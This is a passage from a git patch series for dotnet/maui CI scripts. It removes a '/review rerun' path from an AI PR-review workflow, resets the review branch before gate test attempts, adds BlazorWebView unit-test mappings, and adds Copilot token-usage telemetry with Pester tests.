"" -$rerunContextPath = Join-Path $RepoRoot "CustomAgentLogsTmp/PRState/$PRNumber/PRAgent/rerun/context.md" -$rerunContextScript = Join-Path $ScriptsDir "Resolve-RerunEligibility.ps1" -if (Test-Path $rerunContextScript) { - try { - Write-Host "Generating deterministic rerun context..." -ForegroundColor Cyan - & pwsh -NoProfile -File $rerunContextScript ` - -PRNumber $PRNumber ` - -Owner 'dotnet' ` - -Repo 'maui' ` - -ContextOutputPath $rerunContextPath - if ($LASTEXITCODE -eq 0 -and (Test-Path $rerunContextPath)) { - Write-Host " ✅ rerun context: $rerunContextPath" -ForegroundColor Green - $rerunContextInstruction = @" - -## Deterministic rerun context - -Before pre-flight, read ``CustomAgentLogsTmp/PRState/$PRNumber/PRAgent/rerun/context.md`` if it exists. This file is generated without AI and lists new comments/commits since the latest AI Summary or previous ``/review rerun`` checkpoint. - -When the file has new activity, explicitly include a "New activity since previous AI Summary" subsection in ``pre-flight/content.md`` and prioritize that delta when deciding what changed since the previous review. -"@ - } else { - Write-Host " ⚠️ rerun context generation exited with code $LASTEXITCODE" -ForegroundColor Yellow - } - } catch { - Write-Host " ⚠️ rerun context generation failed: $_" -ForegroundColor Yellow - } -} - # Build regression test instruction for try-fix candidates $regressionTestInstruction = "" if ($risksData -and $regressionTests -and $regressionTests.Count -gt 0) { @@ -1417,7 +1388,6 @@ Generate alternative fix candidates for PR #$PRNumber using an iterative expert- ## Phase 1 — Pre-Flight (context only) Use the pr-review skill's pre-flight phase to gather context about the issue and PR. Do NOT modify code. Write summary to ``CustomAgentLogsTmp/PRState/$PRNumber/PRAgent/pre-flight/content.md``. -$rerunContextInstruction ## Phase 2 — Iterative Try-Fix loop For each candidate, follow this cycle: diff --git a/.github/scripts/post-ai-summary-comment.ps1 b/.github/scripts/post-ai-summary-comment.ps1 index f49bed0248b0..cb22f4de9481 100644 --- a/.github/scripts/post-ai-summary-comment.ps1 +++ b/.github/scripts/post-ai-summary-comment.ps1 @@ -593,7 +593,7 @@ if ($existingRaw) { $authorPing = "" if ($prAuthor) { $authorPing = "> @$prAuthor — new AI review results are available based on this last commit: $commitSha7.`n> **$commitTitle**" - $authorPing += ' To request a deterministic rerun after new comments or commits, comment `/review rerun`.' + $authorPing += ' To request a fresh review after new comments or commits, comment `/review rerun`.' } $reviewStatus = switch ($reviewEvent) { diff --git a/.github/scripts/shared/Update-AgentLabels.ps1 b/.github/scripts/shared/Update-AgentLabels.ps1 index e963e956c63c..7c2cd59c1d15 100644 --- a/.github/scripts/shared/Update-AgentLabels.ps1 +++ b/.github/scripts/shared/Update-AgentLabels.ps1 @@ -37,7 +37,6 @@ $script:SignalLabels = @{ $script:ManualLabels = @{ 's/agent-fix-implemented' = @{ Description = 'PR author implemented the agent suggested fix'; Color = '7B1FA2' } - 's/agent-ready-for-rerun' = @{ Description = 'AI review has new PR activity and is ready for rerun'; Color = '5319E7' } } $script:TrackingLabel = @{ @@ -127,19 +126,10 @@ function Add-Label { [string]$Repo = 'maui' ) - $tmp = $null - try { - $tmp = New-TemporaryFile - @{ labels = @($LabelName) } | ConvertTo-Json -Compress | Set-Content -LiteralPath $tmp -Encoding utf8 -NoNewline - & gh api "repos/$Owner/$Repo/issues/$PRNumber/labels" ` - --method POST ` - --input $tmp 1>$null 2>$null - return $LASTEXITCODE -eq 0 - } finally { - if ($tmp) { - Remove-Item -LiteralPath $tmp -Force -ErrorAction SilentlyContinue - } - } + gh api "repos/$Owner/$Repo/issues/$PRNumber/labels" ` + --method POST ` + -f "labels[]=$LabelName" 2>$null | Out-Null + return $LASTEXITCODE -eq 0 } # ============================================================ @@ -153,8 +143,8 @@ function Remove-Label { [string]$Repo = 'maui' ) - & gh api "repos/$Owner/$Repo/issues/$PRNumber/labels/$([uri]::EscapeDataString($LabelName))" ` - --method DELETE 1>$null 2>$null + gh api "repos/$Owner/$Repo/issues/$PRNumber/labels/$([uri]::EscapeDataString($LabelName))" ` + --method DELETE 2>$null | Out-Null return $LASTEXITCODE -eq 0 } diff --git a/.github/workflows/review-trigger.yml b/.github/workflows/review-trigger.yml index c81111252c4f..be5417181a81 100644 --- a/.github/workflows/review-trigger.yml +++ b/.github/workflows/review-trigger.yml @@ -38,7 +38,6 @@ jobs: timeout-minutes: 2 outputs: matched: ${{ steps.check.outputs.matched }} - command: ${{ steps.check.outputs.command }} steps: - name: Match /review command id: check @@ -47,72 +46,19 @@ jobs: run: | if [ "${{ github.event_name }}" = "workflow_dispatch" ]; then echo "matched=true" >> "$GITHUB_OUTPUT" - echo "command=review" >> "$GITHUB_OUTPUT" - exit 0 - fi - TRIMMED_BODY=$(printf '%s' "${COMMENT_BODY}" | sed -e 's/^[[:space:]]*//' -e 's/[[:space:]]*$//') - if [[ "${TRIMMED_BODY}" =~ ^/review[[:space:]]+rerun$ ]]; then - echo "matched=true" >> "$GITHUB_OUTPUT" - echo "command=rerun" >> "$GITHUB_OUTPUT" - exit 0 - fi - if [[ "${TRIMMED_BODY}" =~ ^/review[[:space:]]+rerun([[:space:]]|$) ]]; then - echo "matched=false" >> "$GITHUB_OUTPUT" - echo "command=none" >> "$GITHUB_OUTPUT" exit 0 fi # Match `/review` as the first non-whitespace token, optionally followed by args. # Allows arbitrary leading whitespace (spaces, tabs, newlines). if [[ "${COMMENT_BODY}" =~ ^[[:space:]]*/review([[:space:]]|$) ]]; then echo "matched=true" >> "$GITHUB_OUTPUT" - echo "command=review" >> "$GITHUB_OUTPUT" else echo "matched=false" >> "$GITHUB_OUTPUT" - echo "command=none" >> "$GITHUB_OUTPUT" fi - mark-rerun-ready: - needs: match - if: needs.match.outputs.matched == 'true' && needs.match.outputs.command == 'rerun' - runs-on: ubuntu-latest - concurrency: - group: review-rerun-${{ github.event.issue.number }} - cancel-in-progress: false - timeout-minutes: 5 - permissions: - contents: read - issues: write - pull-requests: write - steps: - - name: Checkout repository scripts - uses: actions/checkout@v4 - with: - persist-credentials: false - - - name: Determine rerun eligibility and apply label - id: rerun - env: - GH_TOKEN: ${{ github.token }} - shell: pwsh - run: | - .github/scripts/Resolve-RerunEligibility.ps1 ` - -Owner '${{ github.repository_owner }}' ` - -Repo '${{ github.event.repository.name }}' ` - -PRNumber ${{ github.event.issue.number }} ` - -CurrentCommentId ${{ github.event.comment.id }} ` - -ApplyLabel - - - name: Summarize rerun decision - shell: pwsh - run: | - "### /review rerun" >> $env:GITHUB_STEP_SUMMARY - "Eligible: ${{ steps.rerun.outputs.eligible }}" >> $env:GITHUB_STEP_SUMMARY - "Reason: ${{ steps.rerun.outputs.reason }}" >> $env:GITHUB_STEP_SUMMARY - "Label: ${{ steps.rerun.outputs.label }}" >> $env:GITHUB_STEP_SUMMARY - trigger-review: needs: match - if: needs.match.outputs.matched == 'true' && needs.match.outputs.command == 'review' + if: needs.match.outputs.matched == 'true' runs-on: ubuntu-latest concurrency: group: review-trigger-${{ github.event.issue.number || inputs.pr_number }} From 22636b978c56e563ede83b9a4de04f90019bc5ce Mon Sep 17 00:00:00 2001 From: Copilot <223556219+Copilot@users.noreply.github.com> Date: Mon, 1 Jun 2026 15:56:17 +0200 Subject: [PATCH 29/34] Commit squashed PR changes before gate Ensure setup stages all squash-merge output before committing and later phases reattach to the review branch before running. This prevents verify-tests-fail from seeing PR fix files as uncommitted during Gate. Co-authored-by: Copilot <223556219+Copilot@users.noreply.github.com> --- .github/scripts/Review-PR.ps1 | 31 +++++++++++++++++++++++++++++++ 1 file changed, 31 insertions(+) diff --git a/.github/scripts/Review-PR.ps1 b/.github/scripts/Review-PR.ps1 index 575dff836e2b..24bd2b630397 100644 --- a/.github/scripts/Review-PR.ps1 +++ b/.github/scripts/Review-PR.ps1 @@ -302,6 +302,16 @@ if ($DryRun) { Write-Host " 🔀 Merging PR commits (squashed)..." -ForegroundColor Cyan git merge --squash $tempBranch 2>&1 | Out-Null if ($LASTEXITCODE -eq 0) { + # Ensure both staged and unstaged merge output is committed. Some + # squash merges can leave tracked files modified in the worktree rather + # than only staged; Gate later requires fix files to be committed so it + # can restore them with `git checkout HEAD`. + git add -A 2>&1 | Out-Null + if ($LASTEXITCODE -ne 0) { + git branch -D $tempBranch 2>$null + Write-Error "Failed to stage squashed PR changes"; exit 1 + } + # Check if there's anything to commit (PR might already be merged) $staged = git diff --cached --quiet 2>$null; $hasStagedChanges = $LASTEXITCODE -ne 0 if ($hasStagedChanges) { @@ -315,6 +325,14 @@ if ($DryRun) { Write-Host " ⚠️ No changes to merge (PR may already be up to date)" -ForegroundColor Yellow } + git diff --quiet 2>$null; $hasWorktreeChanges = $LASTEXITCODE -ne 0 + git diff --cached --quiet 2>$null; $hasIndexChanges = $LASTEXITCODE -ne 0 + if ($hasWorktreeChanges -or $hasIndexChanges) { + Write-Error "Review branch has uncommitted tracked changes after setup. Gate cannot proceed safely." + git status --short + exit 1 + } + if (Get-Command Remove-StaleMauiBotIssueComments -ErrorAction SilentlyContinue) { Remove-StaleMauiBotIssueComments ` -PRNumber $PRNumber ` @@ -393,6 +411,19 @@ if ($Phase -and $Phase -ne 'Setup') { Write-Error "Setup phase did not complete (sentinel not found at '$sentinelFile'). Cannot proceed with -Phase $Phase." exit 1 } + + if (-not $DryRun) { + git checkout $reviewBranch 2>$null | Out-Null + if ($LASTEXITCODE -ne 0) { + Write-Error "Failed to checkout review branch '$reviewBranch' before -Phase $Phase." + exit 1 + } + git reset --hard HEAD 2>$null | Out-Null + if ($LASTEXITCODE -ne 0) { + Write-Error "Failed to reset review branch '$reviewBranch' before -Phase $Phase." + exit 1 + } + } } # ─── Helper: Parse `dotnet test --logger "console;verbosity=detailed"` ────── From 37918600b3e2f0a72d8ce3c7ede4641f19bd1f90 Mon Sep 17 00:00:00 2001 From: Copilot <223556219+Copilot@users.noreply.github.com> Date: Mon, 1 Jun 2026 15:58:22 +0200 Subject: [PATCH 30/34] Reset review branch before gate retries Restore the committed review branch before each gate verification attempt so a crashed without-fix attempt cannot leave fix files reverted and make the next retry fail with uncommitted changes. Co-authored-by: Copilot <223556219+Copilot@users.noreply.github.com> --- .github/scripts/Review-PR.ps1 | 16 ++++++++++++++++ 1 file changed, 16 insertions(+) diff --git a/.github/scripts/Review-PR.ps1 b/.github/scripts/Review-PR.ps1 index 24bd2b630397..ff07386cc176 100644 --- a/.github/scripts/Review-PR.ps1 +++ b/.github/scripts/Review-PR.ps1 @@ -1089,6 +1089,22 @@ for ($gateAttempt = 1; $gateAttempt -le $maxGateAttempts; $gateAttempt++) { if ($gateAttempt -gt 1) { Write-Host " 🔄 Retry $gateAttempt/$maxGateAttempts — previous attempt hit environment error" -ForegroundColor Yellow } + if (-not $DryRun) { + # Each verification attempt mutates fix files while testing the without-fix + # state. If an attempt aborts before restoring those files, retries must + # start from the committed review branch or they fail immediately with + # "uncommitted changes detected in fix files". + git checkout $reviewBranch 2>$null | Out-Null + if ($LASTEXITCODE -ne 0) { + Write-Error "Failed to checkout review branch '$reviewBranch' before gate attempt $gateAttempt." + exit 1 + } + git reset --hard HEAD 2>$null | Out-Null + if ($LASTEXITCODE -ne 0) { + Write-Error "Failed to reset review branch '$reviewBranch' before gate attempt $gateAttempt." + exit 1 + } + } # Clear previous attempt's report so a crash mid-run doesn't leak its classification into this one. Remove-Item $gateContentFile -Force -ErrorAction SilentlyContinue # Note: -RequireFullVerification is intentionally OMITTED. The verify script From a80f23e33073de10dde179656b6bfeb3fb052a44 Mon Sep 17 00:00:00 2001 From: Copilot <223556219+Copilot@users.noreply.github.com> Date: Mon, 1 Jun 2026 16:04:30 +0200 Subject: [PATCH 31/34] Fix BlazorWebView unit test detection Co-authored-by: Copilot <223556219+Copilot@users.noreply.github.com> --- .github/scripts/shared/Detect-TestsInDiff.ps1 | 2 ++ .../verify-tests-fail-without-fix/scripts/verify-tests-fail.ps1 | 1 + 2 files changed, 3 insertions(+) diff --git a/.github/scripts/shared/Detect-TestsInDiff.ps1 b/.github/scripts/shared/Detect-TestsInDiff.ps1 index b7a141d4e034..daf638970163 100644 --- a/.github/scripts/shared/Detect-TestsInDiff.ps1 +++ b/.github/scripts/shared/Detect-TestsInDiff.ps1 @@ -107,6 +107,7 @@ $UnitTestProjects = @{ "SourceGen.UnitTests" = "src/Controls/tests/SourceGen.UnitTests/" "Core.UnitTests" = "src/Core/tests/UnitTests/" "Essentials.UnitTests" = "src/Essentials/test/UnitTests/" + "MauiBlazorWebView.UnitTests" = "src/BlazorWebView/tests/MauiBlazorWebView.UnitTests/" "Graphics.Tests" = "src/Graphics/tests/Graphics.Tests/" "Resizetizer.UnitTests" = "src/SingleProject/Resizetizer/test/UnitTests/" "Compatibility.Core.UnitTests" = "src/Compatibility/Core/tests/Compatibility.UnitTests/" @@ -120,6 +121,7 @@ $UnitTestProjectPaths = @{ "SourceGen.UnitTests" = "src/Controls/tests/SourceGen.UnitTests/SourceGen.UnitTests.csproj" "Core.UnitTests" = "src/Core/tests/UnitTests/Core.UnitTests.csproj" "Essentials.UnitTests" = "src/Essentials/test/UnitTests/Essentials.UnitTests.csproj" + "MauiBlazorWebView.UnitTests" = "src/BlazorWebView/tests/MauiBlazorWebView.UnitTests/MauiBlazorWebView.UnitTests.csproj" "Graphics.Tests" = "src/Graphics/tests/Graphics.Tests/Graphics.Tests.csproj" "Resizetizer.UnitTests" = "src/SingleProject/Resizetizer/test/UnitTests/Resizetizer.UnitTests.csproj" "Compatibility.Core.UnitTests" = "src/Compatibility/Core/tests/Compatibility.UnitTests/Compatibility.Core.UnitTests.csproj" diff --git a/.github/skills/verify-tests-fail-without-fix/scripts/verify-tests-fail.ps1 b/.github/skills/verify-tests-fail-without-fix/scripts/verify-tests-fail.ps1 index e54d900a1cf1..333f8c7bde11 100644 --- a/.github/skills/verify-tests-fail-without-fix/scripts/verify-tests-fail.ps1 +++ b/.github/skills/verify-tests-fail-without-fix/scripts/verify-tests-fail.ps1 @@ -210,6 +210,7 @@ $script:UnitTestProjectMap = @{ "SourceGen.UnitTests" = "src/Controls/tests/SourceGen.UnitTests/SourceGen.UnitTests.csproj" "Core.UnitTests" = "src/Core/tests/UnitTests/Core.UnitTests.csproj" "Essentials.UnitTests" = "src/Essentials/test/UnitTests/Essentials.UnitTests.csproj" + "MauiBlazorWebView.UnitTests" = "src/BlazorWebView/tests/MauiBlazorWebView.UnitTests/MauiBlazorWebView.UnitTests.csproj" "Graphics.Tests" = "src/Graphics/tests/Graphics.Tests/Graphics.Tests.csproj" "Resizetizer.UnitTests" = "src/SingleProject/Resizetizer/test/UnitTests/Resizetizer.UnitTests.csproj" "Compatibility.Core.UnitTests" = "src/Compatibility/Core/tests/Compatibility.UnitTests/Compatibility.Core.UnitTests.csproj" From 9fb6a047935ebce83792784799c3cc656795e24b Mon Sep 17 00:00:00 2001 From: Copilot <223556219+Copilot@users.noreply.github.com> Date: Fri, 5 Jun 2026 13:36:40 +0200 Subject: [PATCH 32/34] Add Copilot token usage artifacts Capture Copilot CLI usage metadata during review runs, aggregate it into all-stage summaries, and publish a dedicated CopilotTokenUsage artifact from ci-copilot. Co-authored-by: Copilot <223556219+Copilot@users.noreply.github.com> --- .../Aggregate-CopilotTokenUsage.Tests.ps1 | 82 ++++ .github/scripts/Review-PR.Tests.ps1 | 64 ++++ .github/scripts/Review-PR.ps1 | 272 +++++++++++++- .../shared/Aggregate-CopilotTokenUsage.ps1 | 355 ++++++++++++++++++ eng/pipelines/ci-copilot.yml | 65 ++++ 5 files changed, 837 insertions(+), 1 deletion(-) create mode 100644 .github/scripts/Aggregate-CopilotTokenUsage.Tests.ps1 create mode 100644 .github/scripts/shared/Aggregate-CopilotTokenUsage.ps1 diff --git a/.github/scripts/Aggregate-CopilotTokenUsage.Tests.ps1 b/.github/scripts/Aggregate-CopilotTokenUsage.Tests.ps1 new file mode 100644 index 000000000000..f4b7138f36bb --- /dev/null +++ b/.github/scripts/Aggregate-CopilotTokenUsage.Tests.ps1 @@ -0,0 +1,82 @@ +#!/usr/bin/env pwsh +#Requires -Modules Pester +<# +.SYNOPSIS + Pester tests for Aggregate-CopilotTokenUsage.ps1. +#> + +Describe 'Aggregate-CopilotTokenUsage.ps1' { + BeforeEach { + $script:fixtureRoot = Join-Path ([System.IO.Path]::GetTempPath()) "token-usage-fixtures-$([guid]::NewGuid())" + $script:inputRoot = Join-Path $script:fixtureRoot 'input' + $script:outputRoot = Join-Path $script:fixtureRoot 'output' + New-Item -ItemType Directory -Path $script:inputRoot -Force | Out-Null + } + + AfterEach { + Remove-Item -Path $script:fixtureRoot -Recurse -Force -ErrorAction SilentlyContinue + } + + It 'writes raw and summarized artifacts with zero rows for stages without Copilot invocations' { + $nested = Join-Path $script:inputRoot 'CopilotLogs/copilot-token-usage/raw' + New-Item -ItemType Directory -Path $nested -Force | Out-Null + + [ordered]@{ + schemaVersion = 1 + prNumber = 35677 + pipeline = [ordered]@{ stageName = 'ReviewPR' } + scriptPhase = 'CopilotReview' + copilotStep = 'STEP 5a: TRY-FIX' + model = 'gpt-5.5' + durationMs = 5000 + apiDurationMs = 2000 + turnCount = 2 + toolCount = 3 + normalizedTokens = [ordered]@{ + inputTokens = 100 + outputTokens = 40 + cachedInputTokens = 10 + totalTokens = 140 + } + } | ConvertTo-Json -Depth 10 | Set-Content (Join-Path $nested 'copilot-token-usage-a.json') -Encoding UTF8 + + $scriptPath = Join-Path $PSScriptRoot 'shared/Aggregate-CopilotTokenUsage.ps1' + & $scriptPath ` + -InputRoot $script:inputRoot ` + -OutputDir $script:outputRoot ` + -PRNumber '35677' ` + -ExpectedStages @('ReviewPR', 'RunDeepUITests', 'UpdateAISummaryComment', 'AnalyzeCopilotTokenUsage') + + Test-Path (Join-Path $script:outputRoot 'token-usage-raw.jsonl') | Should -Be $true + Test-Path (Join-Path $script:outputRoot 'token-usage-summary.md') | Should -Be $true + Test-Path (Join-Path $script:outputRoot 'token-usage-by-step.csv') | Should -Be $true + + $summary = Get-Content (Join-Path $script:outputRoot 'token-usage-summary.json') -Raw | ConvertFrom-Json + $summary.recordCount | Should -Be 1 + $summary.totals.inputTokens | Should -Be 100 + $summary.totals.outputTokens | Should -Be 40 + $summary.totals.totalTokens | Should -Be 140 + + $reviewStage = $summary.stages | Where-Object { $_.stageName -eq 'ReviewPR' } + $reviewStage.invocationCount | Should -Be 1 + $reviewStage.totalTokens | Should -Be 140 + + $deepStage = $summary.stages | Where-Object { $_.stageName -eq 'RunDeepUITests' } + $deepStage.invocationCount | Should -Be 0 + $deepStage.totalTokens | Should -Be 0 + $deepStage.note | Should -Be 'No Copilot invocation observed in this stage.' + } + + It 'emits a no-record summary when the input artifact is missing' { + $scriptPath = Join-Path $PSScriptRoot 'shared/Aggregate-CopilotTokenUsage.ps1' + & $scriptPath ` + -InputRoot (Join-Path $script:fixtureRoot 'missing') ` + -OutputDir $script:outputRoot ` + -PRNumber '35677' + + $summary = Get-Content (Join-Path $script:outputRoot 'token-usage-summary.json') -Raw | ConvertFrom-Json + $summary.recordCount | Should -Be 0 + ($summary.stages | Where-Object { $_.stageName -eq 'ReviewPR' }).invocationCount | Should -Be 0 + Test-Path (Join-Path $script:outputRoot 'token-usage-by-step.csv') | Should -Be $true + } +} diff --git a/.github/scripts/Review-PR.Tests.ps1 b/.github/scripts/Review-PR.Tests.ps1 index 3d94ccc038ca..934724a2e8bf 100644 --- a/.github/scripts/Review-PR.Tests.ps1 +++ b/.github/scripts/Review-PR.Tests.ps1 @@ -7,6 +7,7 @@ - Get-TrxResults (parses VSTest TRX produced by `dotnet test --logger trx`) - Get-DotNetTestResults (legacy console-output scraper, still used as fallback when TRX is missing) + - Copilot token usage helpers These functions sit on the critical path of STEP 3 (UI Test Execution Results in the AI summary review). A regression here can silently @@ -41,6 +42,69 @@ BeforeAll { Invoke-Expression (Get-FunctionBody -ScriptText $content -FunctionName 'Get-TrxResults') Invoke-Expression (Get-FunctionBody -ScriptText $content -FunctionName 'Get-DotNetTestResults') + Invoke-Expression (Get-FunctionBody -ScriptText $content -FunctionName 'Test-IsNumericValue') + Invoke-Expression (Get-FunctionBody -ScriptText $content -FunctionName 'Get-ObjectMemberValue') + Invoke-Expression (Get-FunctionBody -ScriptText $content -FunctionName 'Get-CopilotUsageTokenFields') + Invoke-Expression (Get-FunctionBody -ScriptText $content -FunctionName 'Get-TokenFieldSum') + Invoke-Expression (Get-FunctionBody -ScriptText $content -FunctionName 'Get-CopilotTokenMetrics') + Invoke-Expression (Get-FunctionBody -ScriptText $content -FunctionName 'New-CopilotTokenUsageRecord') +} + +Describe 'Copilot token usage helpers' { + It 'normalizes known token fields while preserving raw token field paths' { + $usage = [pscustomobject]@{ + inputTokens = 100 + outputTokens = 40 + totalApiDurationMs = 1234 + nested = [pscustomobject]@{ + cachedInputTokens = 12 + } + } + + $metrics = Get-CopilotTokenMetrics -Usage $usage + + $metrics.inputTokens | Should -Be 100 + $metrics.outputTokens | Should -Be 40 + $metrics.cachedInputTokens | Should -Be 12 + $metrics.totalTokens | Should -Be 140 + @($metrics.rawTokenFields).Count | Should -Be 3 + @($metrics.rawTokenFields | Where-Object { $_.Path -eq 'nested.cachedInputTokens' }).Count | Should -Be 1 + } + + It 'builds a telemetry record with raw usage and no hardcoded cost estimate' { + $usage = [pscustomobject]@{ + prompt_tokens = 25 + completion_tokens = 15 + total_tokens = 45 + totalApiDurationMs = 2000 + } + + $record = New-CopilotTokenUsageRecord ` + -PRNumber 35677 ` + -Platform 'android' ` + -Phase 'CopilotReview' ` + -StepName 'STEP 5a: TRY-FIX' ` + -ModelName 'gpt-5.5' ` + -StartedAtUtc ([DateTimeOffset]::Parse('2026-06-05T10:00:00Z')) ` + -EndedAtUtc ([DateTimeOffset]::Parse('2026-06-05T10:00:05Z')) ` + -DurationMs 5000 ` + -TurnCount 2 ` + -ToolCount 3 ` + -FailedToolCount 1 ` + -Usage $usage ` + -ResultEventSeen $true ` + -ExitCode 0 + + $record.prNumber | Should -Be 35677 + $record.scriptPhase | Should -Be 'CopilotReview' + $record.copilotStep | Should -Be 'STEP 5a: TRY-FIX' + $record.apiDurationMs | Should -Be 2000 + $record.normalizedTokens.inputTokens | Should -Be 25 + $record.normalizedTokens.outputTokens | Should -Be 15 + $record.normalizedTokens.totalTokens | Should -Be 45 + $record.usage.total_tokens | Should -Be 45 + $record.costEstimateAvailable | Should -Be $false + } } Describe 'Get-TrxResults' { diff --git a/.github/scripts/Review-PR.ps1 b/.github/scripts/Review-PR.ps1 index ff07386cc176..3c672e82d089 100644 --- a/.github/scripts/Review-PR.ps1 +++ b/.github/scripts/Review-PR.ps1 @@ -37,6 +37,9 @@ .PARAMETER LogFile Capture all output via Start-Transcript +.PARAMETER TokenUsageOutputDir + Directory where Copilot CLI token-usage telemetry records should be written. + .EXAMPLE .\Review-PR.ps1 -PRNumber 33687 .\Review-PR.ps1 -PRNumber 33687 -Platform ios @@ -66,7 +69,10 @@ param( [switch]$DryRun, [Parameter(Mandatory = $false)] - [string]$LogFile + [string]$LogFile, + + [Parameter(Mandatory = $false)] + [string]$TokenUsageOutputDir ) $ErrorActionPreference = 'Stop' @@ -174,6 +180,10 @@ $autonomousRules = @" $reviewBranch = "pr-review-$PRNumber" +if ([string]::IsNullOrWhiteSpace($TokenUsageOutputDir)) { + $TokenUsageOutputDir = Join-Path $RepoRoot "CustomAgentLogsTmp/PRState/$PRNumber/PRAgent/token-usage/raw" +} + # ─── Prerequisites ──────────────────────────────────────────────────────────── if ($runSetup) { Write-Host "📋 Checking prerequisites..." -ForegroundColor Yellow @@ -584,6 +594,240 @@ function Get-TrxResults { } } +# ─── Helper: Copilot token usage telemetry ──────────────────────────────────── +function Test-IsNumericValue { + param([object]$Value) + + return ( + $Value -is [byte] -or + $Value -is [sbyte] -or + $Value -is [int16] -or + $Value -is [uint16] -or + $Value -is [int] -or + $Value -is [uint32] -or + $Value -is [long] -or + $Value -is [uint64] -or + $Value -is [float] -or + $Value -is [double] -or + $Value -is [decimal] + ) +} + +function Get-ObjectMemberValue { + param( + [object]$InputObject, + [string[]]$Names + ) + + if ($null -eq $InputObject) { return $null } + + foreach ($name in $Names) { + if ($InputObject -is [System.Collections.IDictionary] -and $InputObject.Contains($name)) { + return $InputObject[$name] + } + + $property = $InputObject.PSObject.Properties[$name] + if ($property) { + return $property.Value + } + } + + return $null +} + +function Get-CopilotUsageTokenFields { + param( + [object]$Value, + [string]$Path = '' + ) + + $fields = New-Object System.Collections.ArrayList + if ($null -eq $Value) { return @() } + + if (Test-IsNumericValue $Value) { + if ($Path -match '(?i)token') { + [void]$fields.Add([ordered]@{ + Path = $Path + Value = [double]$Value + }) + } + return @($fields.ToArray()) + } + + if ($Value -is [string]) { return @() } + + if ($Value -is [System.Collections.IDictionary]) { + foreach ($key in $Value.Keys) { + $childPath = if ($Path) { "$Path.$key" } else { [string]$key } + foreach ($field in Get-CopilotUsageTokenFields -Value $Value[$key] -Path $childPath) { + [void]$fields.Add($field) + } + } + return @($fields.ToArray()) + } + + if ($Value -is [System.Collections.IEnumerable]) { + $index = 0 + foreach ($item in $Value) { + $childPath = if ($Path) { "$Path[$index]" } else { "[$index]" } + foreach ($field in Get-CopilotUsageTokenFields -Value $item -Path $childPath) { + [void]$fields.Add($field) + } + $index++ + } + return @($fields.ToArray()) + } + + foreach ($property in $Value.PSObject.Properties) { + if ($property.MemberType -notin @('NoteProperty', 'Property', 'AliasProperty')) { + continue + } + + $childPath = if ($Path) { "$Path.$($property.Name)" } else { $property.Name } + foreach ($field in Get-CopilotUsageTokenFields -Value $property.Value -Path $childPath) { + [void]$fields.Add($field) + } + } + + return @($fields.ToArray()) +} + +function Get-TokenFieldSum { + param([object[]]$Fields) + + $items = @($Fields) + if ($items.Count -eq 0) { return $null } + + $sum = 0.0 + foreach ($item in $items) { + $sum += [double]$item.Value + } + + return [long][Math]::Round($sum) +} + +function Get-CopilotTokenMetrics { + param([object]$Usage) + + $tokenFields = @(Get-CopilotUsageTokenFields -Value $Usage) + $inputFields = @($tokenFields | Where-Object { + $_.Path -match '(?i)(input|prompt)' -and + $_.Path -notmatch '(?i)(cache|cached)' -and + $_.Path -notmatch '(?i)total' + }) + $outputFields = @($tokenFields | Where-Object { + $_.Path -match '(?i)(output|completion)' -and + $_.Path -notmatch '(?i)(cache|cached)' -and + $_.Path -notmatch '(?i)total' + }) + $cachedInputFields = @($tokenFields | Where-Object { + $_.Path -match '(?i)(cache|cached)' -and + $_.Path -match '(?i)(input|prompt|read)' + }) + $explicitTotalFields = @($tokenFields | Where-Object { + $_.Path -match '(?i)total' -and + $_.Path -match '(?i)token' + }) + + $inputTokens = Get-TokenFieldSum -Fields $inputFields + $outputTokens = Get-TokenFieldSum -Fields $outputFields + $cachedInputTokens = Get-TokenFieldSum -Fields $cachedInputFields + $totalTokens = Get-TokenFieldSum -Fields $explicitTotalFields + if ($null -eq $totalTokens -and ($null -ne $inputTokens -or $null -ne $outputTokens)) { + $totalTokens = [long](($inputTokens ?? 0) + ($outputTokens ?? 0)) + } + + return [ordered]@{ + inputTokens = $inputTokens + outputTokens = $outputTokens + cachedInputTokens = $cachedInputTokens + totalTokens = $totalTokens + rawTokenFields = @($tokenFields) + } +} + +function New-CopilotTokenUsageRecord { + param( + [int]$PRNumber, + [string]$Platform, + [string]$Phase, + [string]$StepName, + [string]$ModelName, + [datetimeoffset]$StartedAtUtc, + [datetimeoffset]$EndedAtUtc, + [long]$DurationMs, + [int]$TurnCount, + [int]$ToolCount, + [int]$FailedToolCount, + [object]$Usage, + [bool]$ResultEventSeen, + [int]$ExitCode + ) + + $apiDurationValue = Get-ObjectMemberValue -InputObject $Usage -Names @('totalApiDurationMs', 'total_api_duration_ms') + $apiDurationMs = if (Test-IsNumericValue $apiDurationValue) { [long]$apiDurationValue } else { $null } + + return [ordered]@{ + schemaVersion = 1 + generatedAtUtc = ([DateTimeOffset]::UtcNow).ToString('o') + prNumber = $PRNumber + platform = $Platform + pipeline = [ordered]@{ + buildId = $env:BUILD_BUILDID + buildNumber = $env:BUILD_BUILDNUMBER + definitionName = $env:BUILD_DEFINITIONNAME + stageName = $env:SYSTEM_STAGENAME + jobName = $env:SYSTEM_JOBNAME + jobDisplayName = $env:SYSTEM_JOBDISPLAYNAME + taskInstanceId = $env:SYSTEM_TASKINSTANCEID + } + scriptPhase = if ($Phase) { $Phase } else { 'All' } + copilotStep = $StepName + model = $ModelName + startedAtUtc = $StartedAtUtc.ToString('o') + endedAtUtc = $EndedAtUtc.ToString('o') + durationMs = $DurationMs + apiDurationMs = $apiDurationMs + resultEventSeen = $ResultEventSeen + exitCode = $ExitCode + turnCount = $TurnCount + toolCount = $ToolCount + failedToolCount = $FailedToolCount + normalizedTokens = Get-CopilotTokenMetrics -Usage $Usage + usage = $Usage + costEstimateAvailable = $false + costEstimateNote = 'Dollar cost not calculated; no trusted rate table configured.' + } +} + +function Write-CopilotTokenUsageRecord { + param( + [string]$OutputDir, + [object]$Record + ) + + if ([string]::IsNullOrWhiteSpace($OutputDir) -or $null -eq $Record) { + return + } + + try { + New-Item -ItemType Directory -Path $OutputDir -Force | Out-Null + $stepName = [string]$Record.copilotStep + $safeStepName = ($stepName -replace '[^A-Za-z0-9._-]+', '-').Trim('-') + if ([string]::IsNullOrWhiteSpace($safeStepName)) { + $safeStepName = 'copilot-step' + } + + $timestamp = [DateTimeOffset]::UtcNow.ToString('yyyyMMddTHHmmssfffZ') + $fileName = "copilot-token-usage-$timestamp-$safeStepName-$([guid]::NewGuid().ToString('N')).json" + $path = Join-Path $OutputDir $fileName + $Record | ConvertTo-Json -Depth 50 | Set-Content -Path $path -Encoding UTF8 + Write-Host " Token usage record: $path" -ForegroundColor DarkGray + } catch { + Write-Host " WARNING: Failed to write Copilot token usage record: $_" -ForegroundColor 